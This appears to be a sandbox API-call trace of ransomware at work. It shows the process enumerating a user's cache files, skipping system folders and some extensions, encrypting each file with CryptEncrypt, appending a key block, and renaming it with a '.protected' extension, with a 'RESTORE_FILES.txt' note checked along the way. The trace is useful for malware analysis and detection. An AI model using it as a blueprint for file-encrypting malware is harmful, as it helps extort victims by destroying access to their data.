lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Program Files") returned -1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Program Files (x86)") returned -1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="$Recycle.bin") returned 1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="System Volume Information") returned -1 [0088.496] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0088.496] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".protected") returned 0x0 [0088.496] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="RESTORE_FILES.txt") returned -1 [0088.496] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0088.497] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".txt") returned 0x0 [0088.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0088.497] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".rar") returned 0x0 [0088.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0088.497] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".zip") returned 0x0 [0088.497] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.498] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.498] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.498] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.498] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.499] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.499] CloseHandle (hObject=0x150) returned 1 [0088.499] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.protected") returned 161 [0088.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.protected")) returned 1 [0088.500] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Windows") returned -1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Program Files") returned -1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Program Files (x86)") returned -1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="$Recycle.bin") returned 1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="System Volume Information") returned -1 [0088.500] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0088.500] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".protected") returned 0x0 [0088.500] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="RESTORE_FILES.txt") returned -1 [0088.500] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.500] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0088.501] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".txt") returned 0x0 [0088.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0088.502] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".rar") returned 0x0 [0088.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0088.502] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".zip") returned 0x0 [0088.502] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.502] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.503] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.503] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.503] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.503] CloseHandle (hObject=0x150) returned 1 [0088.503] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.protected") returned 161 [0088.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.protected")) returned 1 [0088.504] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Windows") returned -1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Program Files") returned -1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Program Files (x86)") returned -1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="$Recycle.bin") returned 1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="System Volume Information") returned -1 [0088.504] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0088.504] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".protected") returned 0x0 [0088.504] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="RESTORE_FILES.txt") returned -1 [0088.504] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.504] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0088.506] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".txt") returned 0x0 [0088.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0088.506] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".rar") returned 0x0 [0088.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0088.506] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".zip") returned 0x0 [0088.506] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.507] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.507] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.507] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.507] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.507] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.507] CloseHandle (hObject=0x150) returned 1 [0088.508] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.protected") returned 161 [0088.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.protected")) returned 1 [0088.509] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Windows") returned -1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Program Files") returned -1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Program Files (x86)") returned -1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="$Recycle.bin") returned 1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="System Volume Information") returned -1 [0088.509] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0088.509] StrStrIW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".protected") returned 0x0 [0088.509] lstrcmpW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="RESTORE_FILES.txt") returned -1 [0088.509] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.509] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0088.509] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".txt") returned 0x0 [0088.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0088.509] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".rar") returned 0x0 [0088.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0088.510] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".zip") returned 0x0 [0088.510] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x56e, lpOverlapped=0x0) returned 1 [0088.549] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.549] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x56e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x56e, lpOverlapped=0x0) returned 1 [0088.550] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.550] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.550] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.550] CloseHandle (hObject=0x150) returned 1 [0088.550] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.protected") returned 161 [0088.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.protected")) returned 1 [0088.551] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Windows") returned -1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Program Files") returned -1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Program Files (x86)") returned -1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="$Recycle.bin") returned 1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="System Volume Information") returned -1 [0088.551] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0088.551] StrStrIW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".protected") returned 0x0 [0088.551] lstrcmpW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="RESTORE_FILES.txt") returned -1 [0088.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js 